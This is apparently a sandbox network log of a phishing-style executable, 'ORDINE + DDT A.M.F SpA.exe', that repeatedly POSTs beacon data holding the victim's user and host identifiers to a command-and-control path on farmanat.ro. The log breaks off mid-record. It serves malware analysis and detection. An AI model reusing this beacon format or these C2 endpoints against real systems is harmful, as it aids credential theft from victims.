Nov 25, 2021 10:53:57.606286049 CET	7269	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
689	192.168.11.20	50534	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:58.021953106 CET	7270	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:58.055908918 CET	7270	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:58.107873917 CET	7271	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.11.20	49905	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:44.811528921 CET	6405	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:44.845005035 CET	6405	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:44.900487900 CET	6405	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
690	192.168.11.20	50535	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:58.510118008 CET	7271	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:58.543663025 CET	7272	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:58.593468904 CET	7272	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
691	192.168.11.20	50536	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:59.032651901 CET	7273	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:59.066267967 CET	7273	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:59.116414070 CET	7273	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
692	192.168.11.20	50537	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:59.532044888 CET	7274	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:59.566987038 CET	7274	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:59.620790958 CET	7275	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
693	192.168.11.20	50538	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:59.984023094 CET	7275	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:00.018450975 CET	7276	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:00.069199085 CET	7276	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
694	192.168.11.20	50539	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:00.499475956 CET	7277	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:00.533643007 CET	7277	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:00.586044073 CET	7277	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
695	192.168.11.20	50540	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:00.994605064 CET	7278	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:01.028495073 CET	7278	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:01.082277060 CET	7279	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
696	192.168.11.20	50541	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:01.467669964 CET	7279	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:01.501169920 CET	7280	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:01.550327063 CET	7280	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
697	192.168.11.20	50542	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:01.962780952 CET	7281	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:01.997369051 CET	7281	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:02.047734022 CET	7281	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
698	192.168.11.20	50543	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:02.473185062 CET	7282	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:02.506793022 CET	7282	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:02.557339907 CET	7283	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
699	192.168.11.20	50544	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:02.999053001 CET	7283	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:03.033376932 CET	7284	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:03.095596075 CET	7284	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49826	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:04.640363932 CET	6308	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:04.674635887 CET	6309	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:04.724145889 CET	6309	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.11.20	49906	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:45.392079115 CET	6406	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:45.425666094 CET	6406	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:45.483957052 CET	6407	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
700	192.168.11.20	50545	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:03.513998985 CET	7285	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:03.547540903 CET	7285	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:03.598150969 CET	7285	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
701	192.168.11.20	50546	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:04.015227079 CET	7286	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:04.049458981 CET	7286	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:04.102054119 CET	7287	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
702	192.168.11.20	50547	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:04.523262978 CET	7287	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:04.556833029 CET	7288	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:04.608227968 CET	7288	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
703	192.168.11.20	50548	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:05.030325890 CET	7289	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:05.064660072 CET	7289	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:05.115741014 CET	7289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
704	192.168.11.20	50549	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:05.501409054 CET	7290	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:05.535341024 CET	7290	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:05.585587025 CET	7291	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
705	192.168.11.20	50553	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:05.963027000 CET	7292	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:05.996619940 CET	7292	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:06.046257973 CET	7292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
706	192.168.11.20	50554	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
